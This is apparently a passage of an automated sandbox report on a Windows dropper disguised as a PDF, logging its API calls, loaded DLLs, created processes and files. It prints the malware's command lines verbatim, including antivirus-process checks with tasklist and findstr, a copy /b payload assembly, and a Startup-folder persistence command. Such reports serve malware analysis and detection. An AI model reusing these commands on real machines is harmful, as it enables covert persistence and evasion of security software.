Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007216B4 17_2_007216B4
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0070F6A0 17_2_0070F6A0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007278C3 17_2_007278C3
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072DBA5 17_2_0072DBA5
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00721BA8 17_2_00721BA8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00739CE5 17_2_00739CE5
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071DD28 17_2_0071DD28
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072BFD6 17_2_0072BFD6
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00721FC0 17_2_00721FC0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\185027\Spy.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: String function: 00728B30 appears 42 times
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: String function: 00711A36 appears 34 times
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: String function: 00720D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: String function: 00A91A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: String function: 00AA0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: String function: 00AA8B30 appears 42 times
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: String function: 004062A3 appears 57 times
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs scan_doc_zapit_836893.pdf.exe
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000002.2163034210.0000000000722000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs scan_doc_zapit_836893.pdf.exe
Source: scan_doc_zapit_836893.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal92.expl.evad.winEXE@28/17@2/0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEA6AD GetLastError,FormatMessageW, 11_2_00AEA6AD
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD8DE9 AdjustTokenPrivileges,CloseHandle, 11_2_00AD8DE9
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 11_2_00AD9399
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00758DE9 AdjustTokenPrivileges,CloseHandle, 17_2_00758DE9
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00759399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 17_2_00759399
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 11_2_00AE4148
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 11_2_00AE443D
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif File created: C:\Users\user\AppData\Local\NanoSec Cryptographics
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3892:120:WilError_03
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe File created: C:\Users\user\AppData\Local\Temp\nsn992B.tmp
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: scan_doc_zapit_836893.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe File read: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe "C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe"
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o"
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o"
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: version.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: scan_doc_zapit_836893.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA8B75 push ecx; ret 11_2_00AA8B88
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00728B75 push ecx; ret 17_2_00728B88
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071CBDB push eax; retf 17_2_0071CBF8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071CC06 push eax; retf 17_2_0071CBF8

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif File created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif File created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif File deleted: c:\users\user\desktop\scan_doc_zapit_836893.pdf.exe
Source: Possible double extension: pdf.exe Static PE information: scan_doc_zapit_836893.pdf.exe
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_00B059B3
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A95EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_00A95EDA
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 17_2_007859B3
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00715EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 17_2_00715EDA
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 11_2_00AA33B7
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
